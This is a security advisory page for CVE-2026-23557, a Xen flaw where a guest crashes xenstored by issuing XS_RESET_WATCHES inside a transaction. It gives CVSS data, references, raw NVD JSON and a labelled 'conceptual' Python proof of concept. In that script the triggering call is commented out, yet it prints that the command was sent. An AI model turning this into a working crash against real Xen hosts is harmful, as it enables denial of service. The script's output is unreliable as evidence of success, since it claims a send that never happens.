Security Vulnerability Report
CVE-2026-23557 CVSS 6.5 MEDIUM

Published: 2026-05-19 14:16:39
Last Modified: 2026-05-19 18:56:36

Description

Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction due to an assert() triggering.

In case xenstored was built with NDEBUG #defined nothing bad will happen, as assert() is doing nothing in this case. Note that the default is not to define NDEBUG for xenstored builds even in release builds of Xen.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:* - VULNERABLE
Xen (specific versions; see XSA-484)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Conceptual PoC for CVE-2026-23557
# This script attempts to trigger the xenstored crash.
import xs

def trigger_poc():
    try:
        # Connect to xenstored
        handle = xs.open()
        print("[+] Connected to xenstored")
        # Start a transaction
        transaction = handle.transaction_start()
        print(f"[+] Transaction started: {transaction}")
        # Issue XS_RESET_WATCHES inside the transaction
        # Note: Actual implementation depends on python-xs bindings exposing raw commands
        # This represents the logic described in the advisory
        print("[+] Sending XS_RESET_WATCHES inside transaction...")
        # If the bindings allow it, this would be the call:
        # handle.reset_watches(transaction)
        # If successful, xenstored should crash due to assert()
        print("[!] Command sent. Check if xenstored crashed.")
        handle.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    trigger_poc()

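References

https://xenbits.xenproject.org/xsa/advisory-484.html (Patch, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/28/11 (Mailing List, Patch, Third Party Advisory)
http://xenbits.xen.org/xsa/advisory-484.html (Patch, Vendor Advisory)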

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23557", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:38.817", "lastModified": "2026-05-19T18:56:35.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES\ncommand within a transaction due to an assert() triggering.\n\nIn case xenstored was built with NDEBUG #defined nothing bad will\nhappen, as assert() is doing nothing in this case. Note that the\ndefault is not to define NDEBUG for xenstored builds even in release\nbuilds of Xen."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "matchCriteriaId": "37DFEBDB-42A9-4A8C-A040-CC08782EF553"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-484.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/28/11", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-484.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}